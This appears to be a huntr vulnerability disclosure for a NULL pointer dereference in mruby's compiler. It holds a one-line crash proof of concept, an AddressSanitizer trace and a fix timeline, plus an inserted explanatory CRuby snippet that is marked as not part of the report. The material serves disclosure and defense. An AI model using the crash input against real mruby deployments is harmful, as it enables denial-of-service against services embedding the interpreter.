NULL Pointer Dereference in mruby/mruby

Reported on Oct 16th 2021



Proof of Concept (contents of ~/crash.rb, run against an ASan build of mruby):

super super( )


 ~/asan/mruby/bin/mruby ~/crash.rb
==18265==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x56328e0aed60 bp 0x7ffe1b4f1b20 sp 0x7ffe1b4f16f0 T0)
==18265==The signal is caused by a READ memory access.
==18265==Hint: address points to the zero page.
    #0 0x56328e0aed5f in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2833
    #1 0x56328e0a5b03 in gen_values /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:1556
    #2 0x56328e0aea4d in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2807
    #3 0x56328e0a904b in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2100
    #4 0x56328e0a52fe in scope_body /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:1466
    #5 0x56328e0abb65 in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2468
    #6 0x56328e0b6c22 in generate_code /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:3851
    #7 0x56328e0b6ffa in mrb_generate_code /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:3874
    #8 0x56328e071718 in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6843
    #9 0x56328e071eeb in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6911
    #10 0x56328df73092 in main /root/asan/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #11 0x7f9e2ed870b2 in __libc_start_main (/lib/x86_64-linux-gnu/
    #12 0x56328df7042d in _start (/root/asan/mruby/bin/mruby+0xbd42d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2833 in codegen
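The trace above stops in codegen.c, so mruby's parser accepted the one-line PoC and the code generator crashed on the resulting node. As an added example (not part of the report or of the mruby project), the snippet below runs the same construct in CRuby to show what `super super( )` means: it parses as super(super()), the inner explicit-parentheses super() calling the parent method with no arguments and its return value becoming the single argument of the outer super. The class names Base and Child and the method greet are assumed for illustration; the second helper compiles the exact PoC text without executing it, so it works in any Ruby, not just CRuby.

```ruby
# Added example, not code from the huntr report or from mruby. The class
# hierarchy is hypothetical; only the `super super( )` shape is from the PoC.

class Base
  # Accepts zero or one argument so both super calls below resolve here.
  def greet(name = "world")
    "hello #{name}"
  end
end

class Child < Base
  def greet
    # Same shape as the PoC: a super call whose only argument is another super.
    # super()      -> Base#greet()            -> "hello world"
    # super(that)  -> Base#greet("hello world") -> "hello hello world"
    super super()
  end
end

# Returns the value produced by the nested super chain so a caller or test can
# check it instead of relying on printed output.
def nested_super_result
  Child.new.greet
end

# Compiles the PoC text inside a method body of a throwaway module without
# running it. A SyntaxError means the parser rejected the construct; true means
# the parser accepted it, which is the stage mruby also passed before crashing
# in codegen.
def poc_compiles?(poc = "super super( )")
  Module.new.module_eval("def poc_probe; #{poc}; end")
  true
rescue SyntaxError
  false
end

if __FILE__ == $0
  puts nested_super_result   # "hello hello world"
  puts poc_compiles?         # true
end
```

Running this under CRuby prints "hello hello world" and true, confirming the PoC is syntactically valid Ruby; the defect is therefore in how mruby lowers a super node whose argument list contains another super, not in input validation.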
We have contacted a member of the mruby team and are waiting to hear back 2 years ago
Yukihiro "Matz" Matsumoto validated this vulnerability 2 years ago
felling good man has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto marked this as fixed with commit be189a 2 years ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
This vulnerability will not receive a CVE 2 years ago


Thank you!